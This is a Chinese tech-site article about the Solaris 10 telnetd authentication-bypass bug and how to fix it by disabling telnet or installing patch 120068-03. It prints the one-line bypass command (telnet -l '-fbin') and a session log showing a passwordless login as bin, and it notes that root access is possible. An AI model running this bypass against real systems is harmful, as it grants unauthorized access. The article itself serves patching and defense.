51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

听高手谈telnet安全漏洞

作者:佚名
网络 网络管理
telnet安全漏洞的问题如何解决呢?首先我们来了解一下目前telnet安全漏洞的情况,然后再看看高手是如何处理的。

telnet安全问题一直是我们重点关注的问题。那么今天我们就来讨论一下telnet安全漏洞的内容。那么来了解一下telnet安全漏洞的基本情况。早期Solaris 2.6、7 和 8 的 telnetd存在一个漏洞, 可以通过/bin/login的环境变数 TTYPROMPT 绕过验证,导致无需身份认证即可登录。最近,Solaris 10的telnet又被发现出现了漏洞,Sun也及时推出了补丁。

我们先来看问题的症状。漏洞出现的系统环境为Solaris 10及以后版本,安装时没有选择默认安装。漏洞表现为通过在Solaris的telnet命令的-l选项后指定任意一个“-fusername”参数,就可以直接登录进入Solaris系统。

命令格式:

  1. telnet -l "-fbin" target_address 

下面是通过telnet安全漏洞以bin用户登录系统的演示。

  1. # telnet -l "-fbin" myhost  
  2. Trying 172.21.60.120...  
  3. Connected to myhost.  
  4. Escape character is '^]'.  
  5. Sun Microsystems Inc.  SunOS 5.10 Generic January 2005  
  6. $ id -a  
  7. uid=2(bin) gid=2(bin) groups=2(bin),3(sys) 

如果管理员修改了/etc/default/login文件,在注释掉CONSOLE行允许root远程登录的情况下,访问者可以利用该漏洞直接以root登录系统,这样对系统危害更大。

Kingcope最早给出了在OpenSolaris中发现的该漏洞的源代码,并称其为“0day”-零日漏洞。文章地址为:http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

该文章中提供一个脚本,运行后用户可以获得被登录系统的adm用户权限。

解决方法:

1. 禁止Solaris 10的telnet服务。

检查本机的telnet服务是否启动。

  1. # svccfg list | grep telnet  
  2. network/telnet  
  3. # svcs -l network/telnet  
  4. fmri svc:/network/telnet:default  
  5. name Telnet server  
  6. enabled true  
  7. stateonline  
  8. next_state  none  
  9. state_time  Mon Feb 26 03:50:13 2007  
  10. restartersvc:/network/inetd:default 

禁止telnet服务。

  1. # svcadm disable svc:/network/telnet:default 

2. 下载安装Sun的安全补丁(需Sun服务支持)。

Sun的技术支持工程师Alan Hargreaves在他2月13日的BLOG:http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit

中提到,最终解决该问题的补丁120068-03已经发布。通过Solaris 10的Update Manager可以下载安装该补丁,如图所示。这里可以看到该补丁是2月21日发布的。

telnet漏洞

需要说明的是Solaris 10的补丁,除了Security和hardware相关补丁可以免费下载,其它都是要服务支持的,就是Sun Service Plan。但是对于知道Patch号的,可以从http://sunsolve.sun.com中单个下载。这里可以在sunsolve上用PatchFinder查找120068-03补丁并下载,安装到系统中。

安装补丁后系统漏洞被禁止。

  1. # showrev -p | grep 120068  
  2. Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  3. Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  4. # telnet -l "-fbin" myhost  
  5. Trying 172.21.60.120...  
  6. Connected to myhost.  
  7. Escape character is '^]'.  
  8. Password: 

需要用户输入密码登录,可见当前Solaris 10系统的telnet安全漏洞被修正。

对新发现的Solaris 10的telnet安全漏洞,Sun的反应还算迅速,立刻推出了相应补丁程序。这里也可以看见,任何操作系统都是有Bug存在的,Sun通过OpenSolaris开源,使得系统的bug能尽快被发现和完善。

责任编辑:佟健 来源: 网络整理
telnet安全漏洞
相关推荐
telnet安全漏洞分析
文章简读:下面我们来对telnet安全漏洞的一些内容进行分析。首先我们要对telnet安全漏洞的一些症状进行一下了解。

2010-07-26 15:37:12

telnet安全漏洞
高手谈论Oracle Spatial
这里介绍OracleSpatial只能管理简单的“点、线、面”空间要素的存储和检索,而ArcSDE还能管理注记、拓扑关系、栅格数据、CAD数据,并具有版本控制和长事务处理机制。

2009-11-17 10:20:01

Oracle Spat
云应用安全:预防安全漏洞
在本文中,我将讨论三种不同的策略,企业可以用这三种策略来最大限度地提高基于云的应用的安全性,预防可怕的安全漏洞。

2014-06-03 09:23:41

云应用安全:预防安全漏洞
目前,基于云的应用被广泛使用,并且以惊人的速度不断增长。由于基于云的应用可以通过互联网访问,并且任何人,在任何地方都可以访问–因此,应用的安全性变得尤为重要。这就是为什么创建和管理基于云的应用的企业必须要保证:客户所信赖的应用基础架构的每一层都是安全的。

2014-06-03 11:36:18

Microsoft Azure安全漏洞分析
intezer研究人员在MicrosoftAzure发现了2个安全漏洞。

2020-10-09 09:52:00

漏洞分析
Firefox VS IE安全漏洞
据国外媒体报道,来自Secunia公司的报告指出,2008年,MozillaFirefox中存在的漏洞远远超过了IE、苹果Safari以及其他浏览器在。但是,Mozilla公司在处理漏洞的及时性上却超过了微软,修复漏洞的速度大大超前。

2009-03-07 09:59:16

如何避免VPN安全漏洞
对广域网的远程用户而言,虚拟专网(VPN)应该是安全的连接,但是因为许多明显的漏洞,致使许多企业质疑VPN的安全性。RainerEnders是NCPengineering在美洲地区负责VPN安全的CTO。

2011-12-26 11:22:48

BIND多安全漏洞分析
互联网系统协会发布安全公告,督促用户更新DNS服务器来修复BIND漏洞。

2021-05-12 10:46:23

漏洞BINDDNS服务器
职场高手谈加薪的5步秘诀
又到年末,年龄又大了一岁,工作经验又增长了一年,所面临的生存压力也更大了一些,但大家可能最为关心的问题还是:我的薪水会涨吗?

2010-12-13 12:35:56

职场
高手谈怎样调整Oracle数据库
这里阐述了在调整Oracle数据库设计阶段如何避免竞争和如何优化数据访问,在数据库运行阶段如何从操作系统和数据库实例级别上调整内存和IO来达到数据库性能优化的各种技术。

2009-11-02 18:56:49

调整Oracle数据库
高手谈云计算和云端服务市场
这里介绍不管是复杂的云计算应用还是电脑、手机等本身独立的基本操作,其最终端的部份都需要系统与人的互动沟通软件。

2010-03-25 17:31:16

关于Amazon Photos安全漏洞
Checkmarx研究人员发现由于AmazonPhotosAPP中一个组件的错误配置引发了一个安全漏洞,使得manifest文件可以在无需认证的情况下从外部访问。

2022-07-06 11:50:43

漏洞网络攻击
怎么检查Linux安全漏洞
Linux安全漏洞到底怎么检查呢?有没有什么工具可以让帮助我们轻松查出自己系统中的漏洞呢?这里将会详细介绍一种工具。

2010-03-05 15:46:05

XSS网络安全漏洞
为了防范XSS攻击,开发人员应该对用户输入进行严格的过滤和转义,避免直接将未经处理的用户输入插入到网页中。

2023-12-31 09:06:08

Spring Boot安全漏洞
SpringBootActuator模块提供了SpringBoot生产就绪的所有功能。Actuator提供的所有接口可让你监控应用程序各种信息并与之交互。

2024-06-07 15:26:22

高手谈双wan路由器设置技巧
不少网吧都采用了双WAN路由器设置的双WAN口接入设计,但是对于如何使用好这样的设备,用户有不少疑问,我们针对这种路由器中的WAN口设置、WAN口在线检测、流量均衡控制等的设置,我们以TLR480+网吧路由器为例作出详细介绍。

2009-12-03 15:24:39

双wan路由器设置
AI语音克隆产生安全漏洞
据迈克菲公司(McAfee)声称,AI技术正促使在线语音诈骗数量激增,只需要短短三秒的音频就能克隆受害者的语音。

2023-05-29 14:47:46

语音诈骗漏洞人工智能
Web安全漏洞之企业自查
随着网站与网页数的与日俱增,Web安全问题变得更为严峻。由于互联网网站处于全天候的开放状态,而承载网站的应用程序具有自身无法完全克服的Web安全漏洞问题,这就为黑客的入侵提供了可乘之机。

2010-08-30 13:07:31

Skype存“重大安全漏洞
国外媒体报道,德国一名安全专家周三在网上公布了网络电话服务软件Skype存在的一个“重大安全漏洞”,称恶意攻击者可借此劫持用户密码。

2011-08-08 15:48:08

企业何以抗衡信息安全漏洞?
信息安全问题也许是在看了3&8226;15晚会以后才受到重视。但事实上,网络信息安全早就已经成为业界最为关心的问题。

2009-05-13 09:49:07

点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服